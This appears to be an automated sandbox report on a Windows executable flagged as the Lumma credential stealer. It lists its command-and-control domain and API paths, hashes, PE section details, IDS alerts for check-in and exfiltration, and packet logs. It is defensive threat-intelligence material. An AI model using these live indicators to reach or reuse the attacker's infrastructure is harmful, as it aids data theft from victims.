https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.2156184668.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/api1	file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://atten-supporse.biz/apiq	file.exe, 00000000.00000003.2268418527.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/	file.exe, 00000000.00000003.2182636738.0000000005F7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183056768.0000000005F81000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2268418527.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205721535.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://atten-supporse.biz/apis	file.exe, 00000000.00000003.2268418527.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016D0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://atten-supporse.biz:443/api://%ProgramFiles%	file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	atten-supporse.biz	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571961
Start date and time:	2024-12-09 22:34:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:35:00	API Interceptor	8x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
atten-supporse.biz	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	SJqOoILabX.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9
	8GHb2yuPOk.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.16.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://bcnys.us11.list-manage.com/track/click?u=b3ce03a042f3f32fe41fe1faf&id=8c15544f56&e=24911589a5	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.139.78
	GLAMPITECT++LTD+(PROPOSAL).eml	Get hash	malicious	unknown	Browse	104.16.144.15
	https://xxx.cloudlawservices.com/fROBJ/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.64.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.79.7
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	https://quiet-sun-5d9f.atmos4.workers.dev/login	Get hash	malicious	Unknown	Browse	104.21.50.75
	attachDocx.docx	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	SJqOoILabX.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.48.1
	8GHb2yuPOk.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	104.21.48.1

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.948081310283833
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'895'424 bytes
MD5:	52f0f216dfbb86683b1e318a0796dd81
SHA1:	2e2b8710e0a077ed8a2124fde2486f397857b8f6
SHA256:	1d95373c2284b657b614f07051eed5fed72f34f787350409e49e8dc30a5ea494
SHA512:	bf3bff59a42e2d10238306fe34f072c14bd482cac5c20563987a27174bf304a06cfc9c0b3914254f17695d80b006261b29ea025e2b31324ca3caeedf3da211cb
SSDEEP:	49152:4Dkjoj13w8WgZENdIWFHmIy2LRwIi2CUMozodAh:4DjI/UWFHg2LRv1CUHoY
TLSH:	0C9533F94D77E074D148187FE4368778F1766D7908AA729E2B803C1CE421FD264A9EAC
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ug..............................J...........@...........................K...........@.................................\@..p..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8ae000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6755B9EA [Sun Dec 8 15:23:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F450C864EAAh
bswap edx
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F450C866EA5h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0300000Ah], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5405c	0x70	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x24200	405f3f86a324ebe0072ce2d4fffb54e8	False	0.997627865484429	data	7.97823310420282	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x2b0	0x400	fe67bb2a9df3150b9c94de8bd81ed8a0	False	0.3603515625	data	5.186832724894366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	f89f2f28be6f3fc6a464feb82ace12f3	False	0.15625	data	1.1194718105633323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x55000	0x2b1000	0x200	cb84b4f0c589b9e95572e7b3e77c521f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xyjapqsh	0x306000	0x1a7000	0x1a6c00	4912554c090dc3bf4a4983e95f3b433c	False	0.9942076156859846	data	7.953197683807969	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fjnsenoe	0x4ad000	0x1000	0x400	29b9ef51b64269571d6326bf48f66073	False	0.7841796875	data	6.150005771609348	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ae000	0x3000	0x2200	1f5dbc9a32aed1c42020a0ac6b8f5cea	False	0.05710018382352941	DOS executable (COM)	0.7773013744355521	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x53058	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T22:34:59.339141+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.5	64160	1.1.1.1	53	UDP
2024-12-09T22:35:00.868997+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49704	104.21.48.1	443	TCP
2024-12-09T22:35:00.868997+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	104.21.48.1	443	TCP
2024-12-09T22:35:01.920542+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	104.21.48.1	443	TCP
2024-12-09T22:35:01.920542+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	104.21.48.1	443	TCP
2024-12-09T22:35:03.184197+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49705	104.21.48.1	443	TCP
2024-12-09T22:35:03.184197+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	104.21.48.1	443	TCP
2024-12-09T22:35:04.551032+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49705	104.21.48.1	443	TCP
2024-12-09T22:35:04.551032+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	104.21.48.1	443	TCP
2024-12-09T22:35:06.084485+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49706	104.21.48.1	443	TCP
2024-12-09T22:35:06.084485+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.21.48.1	443	TCP
2024-12-09T22:35:08.226993+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49706	104.21.48.1	443	TCP
2024-12-09T22:35:09.573683+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49707	104.21.48.1	443	TCP
2024-12-09T22:35:09.573683+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	104.21.48.1	443	TCP
2024-12-09T22:35:13.269460+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49708	104.21.48.1	443	TCP
2024-12-09T22:35:13.269460+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.48.1	443	TCP
2024-12-09T22:35:16.110444+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49709	104.21.48.1	443	TCP
2024-12-09T22:35:16.110444+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	104.21.48.1	443	TCP
2024-12-09T22:35:18.974676+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49713	104.21.48.1	443	TCP
2024-12-09T22:35:18.974676+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	104.21.48.1	443	TCP
2024-12-09T22:35:18.986057+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49713	104.21.48.1	443	TCP
2024-12-09T22:35:23.317538+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.5	49722	104.21.48.1	443	TCP
2024-12-09T22:35:23.317538+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49722	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2024 22:34:59.645831108 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:34:59.645878077 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:34:59.645970106 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:34:59.647181034 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:34:59.647193909 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:00.868869066 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:00.868997097 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:00.873382092 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:00.873404980 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:00.873717070 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:00.926640987 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:00.927038908 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:00.927068949 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:00.927144051 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:01.920553923 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:01.920639038 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:01.920749903 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:01.922432899 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:01.922449112 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:01.922461033 CET	49704	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:01.922466040 CET	443	49704	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:01.967072964 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:01.967108965 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:01.967171907 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:01.967448950 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:01.967464924 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:03.184102058 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:03.184196949 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:03.185331106 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:03.185339928 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:03.185565948 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:03.188386917 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:03.188420057 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:03.188456059 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.551043034 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.551130056 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.551177025 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.551194906 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.551208019 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.551234961 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.551254988 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.551263094 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.551315069 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.551518917 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.564131021 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.564199924 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.564205885 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.614280939 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.614285946 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.661112070 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.670238972 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.723496914 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.723504066 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.746784925 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.746834993 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.746841908 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.746906996 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.746962070 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.746965885 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.746988058 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.747036934 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.747143984 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.747143984 CET	49705	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.747157097 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.747164965 CET	443	49705	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.870657921 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.870699883 CET	443	49706	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:04.870784998 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.871047974 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:04.871062994 CET	443	49706	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:06.084379911 CET	443	49706	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:06.084485054 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:06.092611074 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:06.092623949 CET	443	49706	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:06.092839956 CET	443	49706	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:06.103116035 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:06.103241920 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:06.103274107 CET	443	49706	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:08.227020979 CET	443	49706	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:08.227216959 CET	443	49706	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:08.227245092 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:08.227277040 CET	49706	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:08.360970974 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:08.361011982 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:08.361068964 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:08.361365080 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:08.361376047 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:09.573570013 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:09.573683023 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:09.574879885 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:09.574886084 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:09.575153112 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:09.576366901 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:09.576477051 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:09.576504946 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:09.576585054 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:09.619334936 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:11.865319014 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:11.865427017 CET	443	49707	104.21.48.1	192.168.2.5
Dec 9, 2024 22:35:11.865938902 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:11.865938902 CET	49707	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:12.055341005 CET	49708	443	192.168.2.5	104.21.48.1
Dec 9, 2024 22:35:12.055386066 CET	443	49708	104.21.48.1	192.168.2.5
